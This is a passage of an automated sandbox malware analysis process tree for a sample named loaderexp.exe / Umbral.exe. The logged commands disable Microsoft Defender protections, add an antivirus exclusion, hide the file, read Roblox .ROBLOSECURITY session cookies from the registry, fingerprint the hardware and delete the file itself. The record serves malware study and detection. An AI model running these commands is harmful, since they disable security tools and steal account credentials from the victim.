        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        41⤵
        
        PID:716
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        41⤵
        Drops file in Drivers directory
        
        PID:4160
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        42⤵
        
        PID:4292
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        Views/modifies file attributes
        
        PID:3516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        
        PID:64
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        42⤵
        
        PID:1036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        42⤵
        
        PID:3920
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        42⤵
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1884
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        42⤵
        Detects videocard installed
        
        PID:3816
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2440
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        43⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        40⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        39⤵
        
        PID:3552
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        38⤵
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        38⤵
        Drops file in Drivers directory
        
        PID:3868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:2464
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        Views/modifies file attributes
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        
        PID:3536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        39⤵
        
        PID:1028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        39⤵
        
        PID:2212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:3140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1884
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        39⤵
        Detects videocard installed
        
        PID:4884
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1012
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        40⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:724
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        37⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        36⤵
        
        PID:628
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        35⤵
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        35⤵
        Drops file in Drivers directory
        
        PID:4192
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:3320
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        Views/modifies file attributes
        
        PID:4256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        36⤵
        
        PID:1756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        
        PID:3180
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        36⤵
        
        PID:1972
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        36⤵
        
        PID:4832
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:3880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        36⤵
        Detects videocard installed
        
        PID:2928
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4036
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        34⤵
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        34⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        33⤵
        Executes dropped EXE
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        Executes dropped EXE
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        32⤵
        Executes dropped EXE
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        Executes dropped EXE
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        31⤵
        Executes dropped EXE
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        31⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4020
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:4692
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        Views/modifies file attributes
        
        PID:724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        32⤵
        
        PID:3880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:1232
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:1392
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:4224
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:1412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:2196
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4084
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4112
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        30⤵
        Executes dropped EXE
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        Executes dropped EXE
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        29⤵
        Executes dropped EXE
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        29⤵
        Executes dropped EXE
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        28⤵
        Executes dropped EXE
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:900
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        29⤵
        Views/modifies file attributes
        
        PID:2244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        29⤵
        
        PID:2500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:1412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        29⤵
        
        PID:2656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        29⤵
        
        PID:64
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:4372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        29⤵
        Detects videocard installed
        
        PID:3740
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3236
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        27⤵
        Executes dropped EXE
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        27⤵
        Executes dropped EXE
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        26⤵
        Executes dropped EXE
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        Executes dropped EXE
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        25⤵
        Executes dropped EXE
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        Executes dropped EXE
        
        PID:4276
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        24⤵
        Executes dropped EXE
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:1688
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        Views/modifies file attributes
        
        PID:4168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:3252
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        25⤵
        
        PID:1172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        25⤵
        
        PID:2588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:3684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        25⤵
        Detects videocard installed
        
        PID:3808
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3252
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        23⤵
        Executes dropped EXE
        
        PID:3952
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        Executes dropped EXE
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        22⤵
        Executes dropped EXE
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        Executes dropped EXE
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        21⤵
        Executes dropped EXE
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:5060
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:3576
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        Views/modifies file attributes
        
        PID:3052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        22⤵
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:3560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        22⤵
        
        PID:3808
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        22⤵
        
        PID:2500
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:3720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3296
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        22⤵
        Detects videocard installed
        
        PID:1980
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3100
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        20⤵
        Executes dropped EXE
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Executes dropped EXE
        
        PID:216
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        19⤵
        Executes dropped EXE
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Executes dropped EXE
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        18⤵
        Executes dropped EXE
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2008
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:1320
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Views/modifies file attributes
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:988
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        19⤵
        
        PID:3288
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        19⤵
        
        PID:4016
        
